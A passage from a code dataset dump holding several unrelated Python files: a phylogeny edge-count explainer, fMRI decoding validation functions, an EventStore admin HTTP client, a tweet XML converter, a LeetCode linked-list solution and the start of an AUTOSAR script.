to e1 ends with internal_edge, it means that it had to\n # walk over the internal edge to get to e1, which ultimately means that l1\n # it isn't on the e1 side / it's on the e2 side. Otherwise, it's on the e1\n # side.\n p = self.path(l1, e1)\n if p[-1] != internal_edge:\n leaf_to_end[l1] = e1\n else:\n leaf_to_end[l1] = e2\n return leaf_to_end\n # MARKDOWN_SEGREGATE_BY_EDGE\n\n # MARKDOWN_NEIGHBOUR_DETECT\n def neighbour_detect(self) -> tuple[int, tuple[N, N]]:\n found_pair = None\n found_total_count = -1\n for l1, l2 in combinations(self.leaf_nodes, r=2):\n normalized_counts = self.combine_edge_count_and_normalize(l1, l2)\n total_count = sum(c for c in normalized_counts.values())\n if total_count > found_total_count:\n found_pair = l1, l2\n found_total_count = total_count\n return found_total_count, found_pair\n # MARKDOWN_NEIGHBOUR_DETECT\n\n def to_dot(self) -> str:\n ret = 'graph G {\\n'\n ret += ' graph[rankdir=LR]\\n'\n ret += ' node[shape=circle, fontname=\"Courier-Bold\", fontsize=10, width=0.4, height=0.4, fixedsize=true]\\n'\n ret += ' edge[fontname=\"Courier-Bold\", fontsize=10]\\n'\n nodes = sorted(self.tree.get_nodes())\n for n in nodes:\n ret += f'{n}\\n'\n for e in self.tree.get_edges():\n n1, n2 = self.tree.get_edge_ends(e)\n ret += f'{n1} -- {n2} [label=\" \"]\\n'\n ret += '}'\n return ret\n\n def combine_count_and_normalize_all_to_dot_subgraph(self) -> str:\n ret = 'graph G {\\n'\n ret += ' graph[rankdir=LR]\\n'\n ret += ' node[shape = circle, fontname=\"Courier-Bold\", fontsize=10, width=0.4, height=0.4, fixedsize=true]\\n'\n ret += ' edge[fontname=\"Courier-Bold\", fontsize=10]\\n'\n ret += ' ranksep=0.25\\n'\n ret += ' fontname=\"Courier-Bold\"\\n'\n ret += ' fontsize=10\\n'\n for l1, l2 in combinations(sorted(self.leaf_nodes), r=2):\n c = self.combine_edge_count_and_normalize(l1, l2)\n ret += f' subgraph cluster_{l1}{l2} {{\\n'\n ret += f' label=\"combine_count_and_normalize({l1},{l2})\"\\n'\n nodes = self.tree.get_nodes()\n for n in nodes:\n ret += f' {l1}{l2}_{n} [label=\"{n}\"'\n if n == l1 or n == l2:\n ret += ', style=filled, fillcolor=gray'\n ret += ']\\n'\n for e in self.tree.get_edges():\n n1, n2 = self.tree.get_edge_ends(e)\n ret += f' {l1}{l2}_{n1} -- {l1}{l2}_{n2} [label=\" \", penwidth=\"2.5\", color=\"{\":invis:\".join([\"black\"] * c[e])}\"]\\n'\n ret += '}\\n'\n ret += '}'\n return ret\n\n\ndef main():\n print(\"
\", end=\"\\n\\n\")\n print(\"`{bm-disable-all}`\", end=\"\\n\\n\")\n try:\n edges, _ = str_to_list(input().strip(), 0)\n tree = create_tree(edges)\n cntr = EdgeCounter(tree)\n print('Given the tree...')\n print()\n print('```{dot}')\n print(f'{cntr.to_dot()}')\n print('```')\n print()\n count, (l1, l2) = cntr.neighbour_detect()\n print(f'neighbour_detect reported that {l1} and {l2} have the highest total edge count of {count} and as such '\n f'are guaranteed to be neighbours.')\n print()\n print('For each leaf pair in the tree, `combine_count_and_normalize()` totals are ... ')\n print()\n print('')\n print('')\n print('')\n for l in sorted(cntr.leaf_nodes):\n print(f'')\n print('')\n print('')\n for l1 in sorted(cntr.leaf_nodes):\n print('')\n print(f'')\n for l2 in sorted(cntr.leaf_nodes):\n if l1 == l2:\n res = 0\n else:\n res = sum(cntr.combine_edge_count_and_normalize(l1, l2).values())\n print(f'')\n print('')\n print('')\n print('
{l}
{l1}{res}
')\n print()\n print('```{dot}')\n print(f'{cntr.combine_count_and_normalize_all_to_dot_subgraph()}')\n print('```')\n finally:\n print(\"
\", end=\"\\n\\n\")\n print(\"`{bm-enable-all}`\", end=\"\\n\\n\")\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"docs/data/learn/Bioinformatics/output/ch8_code/src/ch7_copy/phylogeny/NeighbourJoiningMatrix_EdgeCountExplainer.py","file_name":"NeighbourJoiningMatrix_EdgeCountExplainer.py","file_ext":"py","file_size_in_byte":8356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"384995708","text":"from __future__ import division\nimport numpy as np\nfrom sklearn.linear_model import Ridge\nfrom sklearn.model_selection import KFold, StratifiedKFold\nfrom scipy.stats import multivariate_normal\nfrom inspect import isclass\nfrom sklearn.decomposition import PCA\nfrom scipy.misc import logsumexp\nfrom sklearn.base import BaseEstimator\nfrom sklearn.model_selection._split import _BaseKFold\nfrom sklearn.utils.validation import _num_samples\nimport warnings\n\nclass CustomSplitKFold(_BaseKFold):\n \"\"\"K-Fold cross validation with custom splits\n Expects as splits a list of indices that indicate boundaries between runs\"\"\"\n def __init__(self, splits=None):\n if splits is None:\n raise ValueError('Need to provide a list of indices for splits')\n else:\n self.splits = splits\n self.n_splits = len(self.splits)\n\n def _iter_test_indices(self, X, y=None, groups=None):\n num_samples = _num_samples(X)\n indices = np.arange(num_samples)\n split_indices = np.array_split(indices, self.splits)\n for splits in split_indices:\n yield splits\n\n\ndef select_ridge_output(ridge, select_voxels):\n '''Returns a new Ridge object containing only coefs for select_voxels'''\n from copy import deepcopy\n ridge_copy = deepcopy(ridge)\n ridge_copy.coef_ = ridge.coef_[select_voxels]\n ridge_copy.intercept_ = ridge.intercept_[select_voxels]\n if ridge.alpha.size > 1:\n ridge_copy.alpha = ridge.alpha[select_voxels]\n return ridge_copy\n\n\ndef run_split_from_labels(labels, label_occ=3):\n '''Computes when a new run starts from labels\n Returns a list of numbers each number indicating the first sample in each run\n It assumes that in each run each label occurs label_occ times, thus the label_occ+1 time a label is found, a new run has started'''\n from collections import Counter\n counter = Counter()\n run_samples = []\n for i, label in enumerate(labels):\n if counter[label] == label_occ:\n run_samples.append(i)\n counter.clear()\n counter[label] += 1\n return run_samples\n\n\ndef compute_stability(fmri, labels):\n '''Computes stability score for each voxel\n Uses spearman correlation coefficient'''\n from scipy.stats import spearmanr\n from functools import reduce\n run_samples = run_split_from_labels(labels)\n runs_fmri = np.array_split(fmri, run_samples, axis=0)\n runs_labels = np.array_split(labels, run_samples)\n runs_fmri = [run_fmri[np.argsort(run_labels)][None]\n for run_fmri, run_labels in zip(runs_fmri, runs_labels)]\n try:\n runs_fmri = np.concatenate(runs_fmri)\n except ValueError:\n warnings.warn('One of the runs has less stimuli than the others. Proceeding by aligning number of stimuli.',\n RuntimeWarning)\n shared_stimuli_in_all_runs = reduce(\n np.intersect1d, [np.unique(run_labels) for run_labels in runs_labels])\n runs_fmri = [run_fmri[:, np.isin(run_labels, shared_stimuli_in_all_runs)]\n for run_labels, run_fmri in zip(runs_labels, runs_fmri)]\n runs_fmri = np.concatenate(runs_fmri)\n\n stability = np.array([spearmanr(voxel, axis=0)[0][np.triu_indices(len(run_samples))].mean()\n for voxel in runs_fmri.T])\n return stability\n\n\ndef transform_select_voxels(X, select_voxels=None):\n if select_voxels is None:\n select_voxels = np.arange(X.shape[1])\n return X[:, select_voxels]\n\ndef inverse_transform_select_voxels(X_transformed, select_voxels=None):\n if select_voxels is None:\n select_voxels = np.arange(X_transformed.shape[1])\n X = np.zeros((X_transformed.shape[0], select_voxels.shape[0]))\n X[:, select_voxels] = X_transformed\n return X\n\ndef mve_score(mve, stimulus, fmri, labels, scoring='new'):\n '''For fitted MultiVoxelEncoding object mve.\n returns the decoding accuracy for stimuli,fmri'''\n catdist = np.zeros((25, 5))\n probdist = np.zeros((25, 25))\n for ilbl, lbl in enumerate(np.unique(labels)):\n lbl_given_r = np.array([\n np.sum(\n mve.score(stimulus[np.where(labels==alt_lbl)[0],:],\n fmri[np.where(labels==lbl)[0],:]))\n for alt_lbl in np.unique(labels)])\n probdist[ilbl,:] = lognormalize2(lbl_given_r)\n catdist[ilbl,:] = lognormalize2(logsumexp(np.reshape(lbl_given_r,(5,-1)), axis=1))\n catpbz = np.zeros(catdist.shape)\n maxes = np.argmax(catdist,axis=1)\n catpbz[np.arange(25),maxes] = 1\n pbz = np.zeros(probdist.shape)\n maxes = np.argmax(probdist,axis=1)\n pbz[np.arange(25),maxes] = 1\n\n return (np.sum(np.reshape(catpbz,(5,5,5)),1),pbz)\n\nclass MultiVoxelEncoding(BaseEstimator):\n def __init__(self, models=Ridge, n_components=0.95, cv=None, scoring=None):\n if cv is not None:\n if not isinstance(n_components,list):\n raise RuntimeError('n_components needs to be a'\n 'list for cross-validation')\n if not all(isinstance(n, int) for n in n_components):\n raise RuntimeError('all elements of n_components need '\n 'to be integers')\n\n self.models = models\n self.n_components = n_components\n self.cv = cv\n self.scoring = scoring\n self.pca = None\n self.pca_cov = None\n\n def _pca_transform(self, y):\n pca_y = self.pca.transform(y)\n return pca_y/np.linalg.norm(pca_y)\n\n def fit(self, X, y, labels=None):\n if isinstance(self.n_components, int):\n pca = PCA(n_components=self.n_components)\n y_pred = self.models.predict(X)\n self.pca = pca.fit(y_pred)\n pca_y_pred, pca_y = (self._pca_transform(pcav) for pcav in [y_pred, y])\n self.pca_cov = np.cov(pca_y - pca_y_pred, rowvar=0)\n if self.pca_cov.shape == ():\n self.pca_cov = self.pca_cov[None, None]\n else:\n if self.scoring is None:\n self.scoring = self.score\n scores_dict = {}\n kfold = StratifiedKFold(n_splits=self.cv)\n for value in self.n_components:\n scores = []\n for train, test in kfold.split(X, labels):\n cv_mve = MultiVoxelEncoding(models=self.models, n_components=value, cv=None)\n cv_mve.fit(X[train, :], y[train, :])\n scores.append(\n np.sum(np.diag(mve_score(\n cv_mve, X[test, :], y[test,:], labels[test])[1]))/25.)\n scores_dict[value] = np.mean(scores)\n self.n_components = max(scores_dict, key=scores_dict.get)\n y_pred = self.models.predict(X)\n pca = PCA(n_components=self.n_components)\n pca.fit(y_pred)\n self.pca = pca\n pca_predy, pca_y = (self._pca_transform(pcav) for pcav in [y_pred,y])\n self.pca_cov = np.cov(pca_y - pca_predy,rowvar=0)\n\n def predict(self, X):\n if self.pca is None:\n raise RuntimeError('must call \"fit\" first')\n return self._pca_transform(self.models.predict(X))\n\n def score(self, X, y):\n if self.pca is None:\n raise RuntimeError('must call \"fit\" first')\n return np.array(\n [multivariate_normal.logpdf(row[:, 0], row[:, 1],\n self.pca_cov)\n for row in np.dstack((self._pca_transform(y), self.predict(X)))])\n\ndef lognormalize2(x):\n a = np.max(x) + np.logaddexp.reduce(x-np.max(x))\n return np.exp(x-a)\n\ndef pdf_multi_normal(x, mean, cov):\n '''Multivariate normal pdf with three parts'''\n import numpy as np\n k = x.shape[0]\n part1 = np.exp(-0.5*k*np.log(2*np.pi))\n part2 = np.power(np.linalg.det(cov),-0.5)\n dev = x - mean\n part3 = np.exp(-0.5*np.dot(np.dot(dev.T,np.linalg.inv(cov)),dev))\n return part1 * part2 * part3\n\ndef score_diffcat(y_true, y_pred, labels, ctype='pearson'):\n '''Compute the rankscore (Santoro et al., 2014) of the data'''\n import numpy as np\n from scipy.stats import pearsonr,spearmanr,rankdata\n if ctype == 'pearson':\n cfunc = pearsonr\n else:\n cfunc = spearmanr\n ranks = np.zeros((y_pred.shape[0],))\n for i in xrange(y_pred.shape[0]):\n correlations = [cfunc(y_pred[i,:],y_true[j,:])[0] for j in xrange(y_true.shape[0]) if labels[j]!=labels[i]]\n correlations.append(cfunc(y_pred[i,:],y_true[i,:])[0])\n ranks[i] = ((rankdata(correlations)[-1])/(len(correlations)))\n return ranks\n\ndef binary_retrieval(y_true, y_pred, labels):\n '''Compute the binary retrieval accuracy (Mitchell et al., 2008) for the data'''\n import numpy as np\n def cosine_similarity(a,b):\n return np.dot(a,b)/(np.linalg.norm(a)*np.linalg.norm(b))\n match_acc = np.zeros((y_pred.shape[0],))\n for i in xrange(y_pred.shape[0]):\n match = 0.\n for j in xrange(y_pred.shape[0]):\n if labels[j] == labels[i]:\n continue\n score_true = cosine_similarity(y_pred[i,:],y_true[i,:]) + cosine_similarity(y_pred[j,:],y_true[j,:])\n score_false = cosine_similarity(y_pred[i,:],y_true[j,:]) + cosine_similarity(y_pred[j,:],y_true[i,:])\n if score_true > score_false:\n match += 1.\n match_acc[i] = match / np.sum(labels!=labels[i])\n return match_acc\n\ndef confmat_from_labels(mve, stimulus, fmri, labels):\n '''Returns a 25x25 confusion matrix'''\n probdist = np.zeros((25, 25))\n unique_labels = [genre + str(i) for genre in ['ambient', 'country', 'metal', 'rocknroll', 'symphonic'] for i in range(5)]\n for ilbl, lbl in enumerate(unique_labels):\n lbl_given_r = np.array([\n np.sum(mve.score(\n stimulus[np.where(labels==alt_lbl)[0],:],\n fmri[np.where(labels==lbl)[0],:])) if alt_lbl in np.unique(labels) else 0.\n for alt_lbl in unique_labels])\n probdist[ilbl,:] = lognormalize2(lbl_given_r)\n confmat = np.zeros((25, 25))\n for i in range(25):\n confmat[i, np.argmax(probdist[i])] = 1\n return confmat\n\n","sub_path":"code/validation_functions.py","file_name":"validation_functions.py","file_ext":"py","file_size_in_byte":10175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"91768451","text":"from future.standard_library import install_aliases\ninstall_aliases()\n\nfrom collections import namedtuple\nimport requests\nfrom requests.auth import HTTPBasicAuth\nfrom urllib.parse import urljoin, urlparse\nimport uuid\n\n\nJSON=\"application/json\"\nATOM=\"application/vnd.eventstore.atom+json\"\nEVENTS=\"application/vnd.eventstore.events+json\"\nSTREAMDESC=\"application/vnd.eventstore.streamdesc+json\"\n\nUser = namedtuple(\n 'user', [\n 'login_name', 'full_name', 'disabled', 'links', 'groups'])\n\ndef as_set(val):\n return set() if not val else set(val)\n\nclass Acl:\n\n def __init__(self, read=None, write=None, delete=None, metadata_read=None, metadata_write=None):\n self.read = read\n self.write = write\n self.delete = delete\n self.metadata_read = metadata_read\n self.metadata_write = metadata_write\n\n\n def __eq__(self, other):\n return (self.as_set(self.read) == self.as_set(other.read)\n and self.as_set(self.write) == self.as_set(other.write)\n and self.as_set(self.delete) == self.as_set(other.delete)\n and self.as_set(self.metadata_read) == self.as_set(other.metadata_read)\n and self.as_set(self.metadata_write) == self.as_set(other.metadata_write))\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n\n def to_dict(self):\n return {k:v for k,v in {\n \"$r\": self.read,\n \"$w\": self.write,\n \"$d\": self.delete,\n \"$mr\": self.metadata_read,\n \"$mw\": self.metadata_write\n }.items()\n if v is not None}\n\n @staticmethod\n def get_entry(v):\n if isinstance(v, str):\n return [v]\n return v\n\n @staticmethod\n def from_dict(data):\n return Acl(read = Acl.get_entry(data[\"$r\"]),\n write = Acl.get_entry(data[\"$w\"]),\n delete = Acl.get_entry(data[\"$d\"]),\n metadata_read = Acl.get_entry(data[\"$mr\"]),\n metadata_write = Acl.get_entry(data[\"$mw\"]))\n\n def coalesce(self, first, snd):\n return first if first is not None else snd\n\n def update(self, other):\n return Acl(\n read = self.coalesce(self.read, other.read),\n write = self.coalesce(self.write, other.write),\n delete = self.coalesce(self.delete, other.delete),\n metadata_read = self.coalesce(self.metadata_read, other.metadata_read),\n metadata_write = self.coalesce(self.metadata_write, other.metadata_write)\n )\n\n\n def merge(self, a, b):\n if not a:\n return b\n if not b:\n return a\n result = set(a)\n result.update(set(b))\n return sorted(list(result))\n\n def strip(self, a, b):\n if not a:\n return b\n if not b:\n return a\n result = set(a)\n result.difference_update(set(b))\n return sorted(list(result))\n\n\n def as_set(self, val):\n return set(val) if val else set()\n\n def grant(self, other):\n return Acl(\n read = self.merge(self.read, other.read),\n write = self.merge(self.write, other.write),\n delete = self.merge(self.delete, other.delete),\n metadata_read = self.merge(self.metadata_read, other.metadata_read),\n metadata_write = self.merge(self.metadata_write, other.metadata_write)\n )\n\n def revoke(self, other):\n return Acl(\n read = self.strip(self.read, other.read),\n write = self.strip(self.write, other.write),\n delete = self.strip(self.delete, other.delete),\n metadata_read = self.strip(self.metadata_read, other.metadata_read),\n metadata_write = self.strip(self.metadata_write, other.metadata_write)\n )\n\n def is_empty(self):\n return not any(self.to_dict())\n\n @staticmethod\n def empty():\n return Acl()\n\n @staticmethod\n def deny_all():\n return Acl(read=[], write=[], delete=[], metadata_read=[], metadata_write=[])\n\n\nDEFAULT_DEFAULT_ACL=(Acl(\n read=[\"$all\"],\n write=[\"$all\"],\n delete=[\"$all\"],\n metadata_read=[\"$all\"],\n metadata_write=[\"$all\"]),\n Acl(\n read=[\"$admins\"],\n write=[\"$admins\"],\n delete=[\"$admins\"],\n metadata_read=[\"$admins\"],\n metadata_write=[\"$admins\"]\n ))\n\nclass NotFoundException(Exception):\n pass\n\n\nclass AuthenticationException(Exception):\n pass\n\nclass UserManager:\n\n def __init__(self, client):\n self.client = client\n\n def create(self, username, password, fullname=None, groups=[]):\n self.client.post('/users/',\n {\n \"loginName\": username,\n \"password\": password,\n \"fullName\": fullname or username,\n \"groups\": groups\n }, JSON)\n\n def get(self, username):\n response = self.client.get('/users/'+username, JSON)\n if response.status_code == 404:\n raise UserNotFoundException()\n data = response.json()['data']\n return User(login_name=data['loginName'],\n full_name=data['fullName'],\n disabled=data['disabled'],\n groups=data['groups'],\n links={\n l['rel']: l['href'] for l in data['links']\n })\n\n def delete(self, username):\n user = self.get(username)\n response = self.client.delete(user.links['delete'])\n print(response)\n\n def addgroup(self, username, *args):\n user = self.get(username)\n groups = set(user.groups)\n groups.update(args)\n\n response = self.client.put(user.links['edit'], {\n \"fullName\": user.full_name,\n \"groups\": list(groups)\n }, JSON)\n\n def removegroup(self, username, *args):\n user = self.get(username)\n groups = set(user.groups)\n groups.difference_update(args)\n\n response = self.client.put(user.links['edit'], {\n \"fullName\": user.full_name,\n \"groups\": list(groups)\n }, JSON)\n\n def rename(self, username, full_name):\n user = self.get(username)\n response = self.client.put(user.links['edit'], {\n \"fullName\": full_name,\n \"groups\": user.groups\n }, JSON)\n\n def setpassword(self, username, password):\n user = self.get(username)\n self.client.post(user.links['reset-password'], {\n 'newPassword': password\n }, JSON)\n\n\nclass StreamManager:\n\n def __init__(self, client):\n self.client = client\n\n def create(self, name, acl=Acl.empty(), eventid=None):\n metadata = {\n \"eventId\": str(eventid or uuid.uuid4()),\n \"eventType\": \"settings\"\n }\n if not acl.is_empty():\n metadata[\"data\"] = {\"$acl\": acl.to_dict()}\n\n self.client.post(\"/streams/\"+name+\"/metadata\", [metadata], EVENTS)\n\n def get_acl(self, name):\n response = self.client.get('/streams/'+name+'/metadata', JSON)\n data = response.json()\n if \"$acl\" in data:\n return Acl.from_dict(data[\"$acl\"])\n return None\n\n\n def set_acl(self, name, acl, eventid=None):\n current = self.get_acl(name)\n event = {\n \"eventId\": str(eventid or uuid.uuid4()),\n \"eventType\": \"settings\",\n \"data\": {\n \"$acl\": acl.to_dict()\n }\n }\n self.client.post(\"/streams/\"+name+\"/metadata\", [event], EVENTS)\n\n def delete(self, name):\n self.client.delete('/streams/'+name)\n\n def grant(self, stream, acl=Acl.empty(), eventid=None):\n current = self.get_acl(stream) or Acl.empty()\n new = current.grant(acl)\n self.set_acl(stream, new, eventid)\n\n def revoke(self, stream, acl=Acl.empty(), eventid=None):\n current = self.get_acl(stream) or Acl.empty()\n new = current.revoke(acl)\n self.set_acl(stream, new, eventid)\n\n\nclass DefaultAclManager:\n\n def __init__(self, client, is_system=False):\n self.client = client\n self.is_system = is_system\n\n def get_acl(self):\n try:\n response = self.client.get('/streams/$settings', EVENTS)\n except NotFoundException:\n return DEFAULT_DEFAULT_ACL\n\n latest = response.json()[\"entries\"][0]\n acl = self.client.get(latest[\"id\"], JSON).json()\n return(Acl.from_dict(acl[\"$userStreamAcl\"]),\n Acl.from_dict(acl[\"$systemStreamAcl\"]))\n\n def set_acl(self, acl, eventid=None):\n user,system = self.get_acl()\n if self.is_system:\n system = acl.update(Acl.deny_all())\n else:\n user = acl.update(Acl.deny_all())\n\n event = {\n \"eventId\": str(eventid or uuid.uuid4()),\n \"eventType\": \"settings\",\n \"data\": {\n \"$userStreamAcl\": user.to_dict(),\n \"$systemStreamAcl\": system.to_dict()\n }\n }\n self.client.post(\"/streams/$settings\", [event], EVENTS)\n\n def grant(self, acl=Acl.empty(), eventid=None):\n user, system = self.get_acl()\n current = system if self.is_system else user\n new = current.grant(acl)\n self.set_acl(new, eventid)\n\n def revoke(self, acl, eventid=None):\n user, system = self.get_acl()\n current = system if self.is_system else user\n new = current.revoke(acl)\n self.set_acl(new, eventid)\n\n\nclass SubscriptionManager:\n\n def __init__(self, client):\n self.client = client\n\n def get(self, group_name, stream):\n response = self.client.get('/subscriptions/{}/{}/info'.format(stream, group_name), JSON)\n\n data = response.json()\n\n return data\n\n def create(self,\n group_name,\n stream,\n resolve_link_tos=False,\n start_from=0,\n message_timeout=10000,\n extra_statistics=False,\n max_retry=10,\n live_buffer_size=500,\n buffer_size=500,\n read_batch_size=20,\n checkpoint_after=1000,\n min_checkpoint_count=10,\n max_checkpoint_count=500,\n max_subscriber_count=10,\n named_consumer_strategy=\"RoundRobin\"):\n\n self._validate_consumer_strategy(named_consumer_strategy)\n\n body = {\n \"checkpoints\": checkpoint_after,\n \"resolveLinktos\": resolve_link_tos,\n \"startFrom\": start_from,\n \"messageTimeoutMilliseconds\": message_timeout,\n \"extraStatistics\": extra_statistics,\n \"maxRetryCount\":max_retry,\n \"liveBufferSize\": live_buffer_size,\n \"bufferSize\": buffer_size,\n \"readBatchSize\": read_batch_size,\n \"checkPointAfterMilliseconds\": checkpoint_after,\n \"minCheckPointCount\": min_checkpoint_count,\n \"maxCheckPointCount\": max_checkpoint_count,\n \"maxSubscriberCount\": max_subscriber_count,\n \"namedConsumerStrategy\": named_consumer_strategy}\n\n\n response = self.client.put(\n \"/subscriptions/{}/{}\".format(stream, group_name),\n body,\n JSON)\n\n return body\n\n def delete(self, group_name, stream):\n self.client.delete('/subscriptions/{}/{}'.format(stream, group_name))\n\n def update(self,\n group_name,\n stream,\n resolve_link_tos=None,\n start_from=None,\n message_timeout=None,\n extra_statistics=None,\n max_retry=None,\n live_buffer_size=None,\n buffer_size=None,\n read_batch_size=None,\n checkpoint_after=None,\n min_checkpoint_count=None,\n max_checkpoint_count=None,\n max_subscriber_count=None,\n named_consumer_strategy=None):\n\n current = self.get(group_name, stream)['config']\n\n strategy = current['namedConsumerStrategy'] if named_consumer_strategy is None else named_consumer_strategy\n self._validate_consumer_strategy(strategy)\n\n body = {\n \"checkpoints\": current['checkPointAfterMilliseconds'] if checkpoint_after is None else checkpoint_after,\n \"resolveLinktos\": current['resolveLinktos'] if resolve_link_tos is None else resolve_link_tos,\n \"startFrom\": current['startFrom'] if start_from is None else start_from,\n \"messageTimeoutMilliseconds\": current['messageTimeoutMilliseconds'] if message_timeout is None else message_timeout,\n \"extraStatistics\": current['extraStatistics'] if extra_statistics is None else extra_statistics,\n \"maxRetryCount\": current['maxRetryCount'] if max_retry is None else max_retry,\n \"liveBufferSize\": current['liveBufferSize'] if live_buffer_size is None else live_buffer_size,\n \"bufferSize\": current['bufferSize'] if buffer_size is None else buffer_size,\n \"readBatchSize\": current['readBatchSize'] if read_batch_size is None else read_batch_size,\n \"checkPointAfterMilliseconds\": current['checkPointAfterMilliseconds'] if checkpoint_after is None else checkpoint_after,\n \"minCheckPointCount\": current['minCheckPointCount'] if min_checkpoint_count is None else min_checkpoint_count,\n \"maxCheckPointCount\": current['maxCheckPointCount'] if max_checkpoint_count is None else max_checkpoint_count,\n \"maxSubscriberCount\": current['maxSubscriberCount'] if max_subscriber_count is None else max_subscriber_count,\n \"namedConsumerStrategy\": strategy}\n\n\n response = self.client.post(\n \"/subscriptions/{}/{}\".format(stream, group_name),\n body,\n JSON)\n\n return {\n \"old_config\": current,\n \"new_config\": body}\n\n def _validate_consumer_strategy(self, strategy):\n VALID_CONSUMER_STRATEGIES = [\n \"RoundRobin\",\n \"DispatchToSingle\",\n \"Pinned\"]\n\n if strategy not in VALID_CONSUMER_STRATEGIES:\n raise ValueError(\"Named Startegy {} is not recognised\".format(strategy))\n\n\nclass Client:\n\n def __init__(self, host, port, username, password, no_ssl=False):\n scheme = \"http\" if no_ssl else \"https\"\n self.base_uri = \"{0}://{1}:{2}\".format(scheme, host, port)\n self.users = UserManager(self)\n self.streams = StreamManager(self)\n self.user_acl = DefaultAclManager(self)\n self.system_acl = DefaultAclManager(self, is_system=True)\n self.subscriptions = SubscriptionManager(self)\n self.username = username\n self.password = password\n\n def __handle(self, r):\n if r.status_code == 401:\n raise AuthenticationException()\n if r.status_code == 404:\n raise NotFoundException()\n r.raise_for_status()\n return r\n\n def get_uri(self, path):\n return urljoin(self.base_uri, str(path))\n\n def post(self, path, body, content_type):\n response = requests.post(\n self.get_uri(path),\n json=body,\n auth=HTTPBasicAuth(\n self.username,\n self.password),\n headers={\n 'Content-Type': content_type})\n return self.__handle(response)\n\n def get(self, path, content_type):\n return self.__handle(requests.get(self.get_uri(path)+'?embed=tryharder',\n auth=HTTPBasicAuth(self.username, self.password),\n headers={\n 'Accept': content_type\n }))\n\n def put(self, path, body, content_type):\n return self.__handle(requests.put(self.get_uri(path),\n auth=HTTPBasicAuth(self.username, self.password),\n json=body,\n headers={\n 'Content-Type': content_type\n }))\n\n def delete(self, path):\n return self.__handle(requests.delete(self.get_uri(path),\n auth=HTTPBasicAuth(\n self.username,\n self.password)))\n\n @staticmethod\n def from_uri(uri, username, password):\n parts = urlparse(uri)\n return Client(parts.hostname, parts.port, username, password,\n no_ssl=(parts.scheme == \"http\"))\n","sub_path":"ouroboros/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":16699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"3011760","text":"#%%\nfrom logging import getLogger , NullHandler\nimport xml.etree.ElementTree as ET\n\n#%%\nclass XmlToTweets:\n\n \n def __init__(self,xmlfilepath,*,logger=None):\n __logger = getLogger(__name__)\n __logger.addHandler(NullHandler())\n logger = logger or __logger\n try:\n with open(xmlfilepath,\"r\",encoding=\"utf-8\") as f:\n self.XmlString = f.read()\n except FileNotFoundError:\n logger.error(\"FileNotFonundError{0}\".format(xmlfilepath))\n raise\n \n def tweets_to_xml(self,path,tweets):\n root = ET.Element(\"tweets\")\n for tweet in tweets:\n tweetElement = ET.SubElement(root,\"tweet\")\n tweetElement.set(\"id\",tweet[\"id\"])\n textElement = ET.SubElement(tweetElement,\"text\")\n textElement.text = tweet[\"text\"]\n wakatiElement = ET.SubElement(tweetElement,\"wakati\")\n wakatiElement.text = tweet[\"wakati\"]\n with open(path,\"w\",encoding=\"utf-8\") as f:\n et = ET.ElementTree(root)\n et.write(f,encoding=\"unicode\")\n\n def xml_to_tweets(self,limit=0,*,exclude_wakati=False,exclude_text=False,logger=None):\n __logger = getLogger(__name__)\n __logger.addHandler(NullHandler())\n logger = logger or __logger\n try:\n root = ET.fromstring(self.XmlString)\n except ET.ParseError as e:\n logger.error(e.args)\n\n tweets = []\n c = 0\n for element in root.getchildren():\n tweet = dict()\n tweet[\"id\"] = element.items()[0][1]\n logger.info(\"Now target: {0}\".format(tweet[\"id\"]))\n for subelement in element.getchildren():\n if subelement.tag == \"wakati\" and not exclude_wakati:\n tweet[\"wakati\"] = subelement.text\n elif subelement.tag == \"text\" and not exclude_text:\n tweet[\"text\"] = subelement.text\n tweets.append(tweet)\n c = c + 1\n if limit != 0 and c >= limit:\n break\n\n return tweets\n\n#%%\nif __name__ == \"__main__\":\n from logging import getLogger, StreamHandler, DEBUG\n logger = getLogger(__name__)\n logger.setLevel(DEBUG)\n handler = StreamHandler()\n handler.setLevel(DEBUG)\n logger.addHandler(handler)\n logger.propagate = False\n\n X2T = XmlToTweets(\"get_tweets/AbeShinzo/tweets.xml\",logger=logger)\n l = X2T.xml_to_tweets(2)\n print(l[0])\n ","sub_path":"get_tweets/xml_to_tweet.py","file_name":"xml_to_tweet.py","file_ext":"py","file_size_in_byte":2472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"348772386","text":"# Write a program to find the node at which the intersection of two singly\n# linked lists begins.\n# \n# \n# For example, the following two linked lists:\n# \n# A: a1 -> a2\n# c1 -> c2 -> c3\n# B: b1 -> b2 -> b3\n# begin to intersect at node c1.\n# \n# \n# Notes:\n# \n# If the two linked lists have no intersection at all, return null.\n# The linked lists must retain their original structure after the function\n# returns.\n# You may assume there are no cycles anywhere in the entire linked structure.\n# Your code should preferably run in O(n) time and use only O(1) memory.\n\nclass Solution(object):\n def getIntersectionNode(self, headA, headB):\n \"\"\"\n :type head1, head1: ListNode\n :rtype: ListNode\n \"\"\"\n if not headA or not headB:\n return None\n\n a = headA\n b = headB\n\n tail_A = None\n tail_B = None\n while True:\n if not a:\n a = headB\n if not b:\n b = headA\n if not a.next:\n tail_A = a\n if not b.next:\n tail_B = b\n if tail_A and tail_B and tail_A != tail_B:\n return None\n if a == b:\n return a\n a = a.next\n b = b.next\n","sub_path":"src/leetcode/LC_160_intersection_of_two_linked_list.py","file_name":"LC_160_intersection_of_two_linked_list.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"598292129","text":"dev_mode = False\nif dev_mode:\n import os, sys\n sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '../../..')))\nimport autosar\n\ndef create_autosar_platform(ws):\n package = ws.createPackage('AUTOSAR_Platform')\n baseTypes = package.createSubPackage('BaseTypes', role='DataType')\n package.createSubPackage('CompuMethods', role='CompuMethod')\n package.createSubPackage('DataConstrs', role='DataConstraint')\n implTypes = package.createSubPackage('ImplementationDataTypes')\n baseTypes.createSwBaseType('dtRef_const_VOID', 1, encoding = 'VOID', nativeDeclaration = 'void')\n 